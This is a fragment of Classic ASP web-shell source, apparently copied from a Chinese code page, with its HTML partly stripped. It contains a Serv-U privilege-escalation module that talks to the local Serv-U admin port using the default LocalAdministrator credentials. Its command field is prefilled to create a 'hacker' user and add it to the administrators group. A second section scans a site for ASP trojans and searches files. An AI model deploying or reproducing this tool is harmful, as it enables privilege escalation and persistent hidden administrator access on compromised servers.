case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"提权完毕,已执行了命令:
color=red>"&cmd&"
"
RRS"Action=Servu';"">"
RRS""
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS""
RRS"cellspacing='1' bordercolor='#666666'>"
RRS""
RRS"Serv-U 提升权限 漫步云端修改版"
RRS""
RRS""
RRS"用户名:"
RRS"value='LocalAdministrator'>"
RRS""
RRS""
RRS"口 令: | "
RRS"value='#l@$ak#.lk;0@P'> | "
RRS""
RRS""
RRS"端 口: | "
RRS" | "
RRS""
RRS""
RRS"系统路径: | "
RRS" size='8'> | "
RRS" "
RRS" "
RRS" 命 令: | "
RRS" hacker 123456 /add & net localgroup administrators hacker /add'
size='50'> | "
RRS" "
RRS" "
RRS" 交'> "
RRS""
RRS""
RRS""
end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Case "kmuma"
dim Report
if request.QueryString("act")<>"scan" then
RRS ("网站根目录- "&Server.MapPath("/")&"
")
RRS ("本程序目录- "&Server.MapPath("."))
RRS "method=""post"" name=""form1"">"
RRS "填入你要检查的路径:"
RRS "style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录
"
RRS "你要干什么: type=""radio"" value=""sws"" onClick=""document.getElementById
('showFile1').style.display='none'"" checked>查ASP 马"
RRS "value=""sf"" onClick=""document.getElementById
('showFile1').style.display=''"">搜索符合条件之文件
"
RRS "style=""display:none"">"
RRS " 查找内容:name=""Search_Content"" type=""text"" id=""Search_Content""
style=""border:1px solid #999"" size=""20"">"
RRS " 要查找的字符串,不填就只进行日期检查"
RRS " 修改日期:type=""text"" style=""border:1px solid #999"" value="""&Left(Now
(),InStr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
onClick=""javascript:form1.Search_Date.value='ALL'"">ALL"
RRS " 文件类型:name=""Search_FileExt"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型/>
京公网安备 11010802040832号 | 京ICP备19059560号-6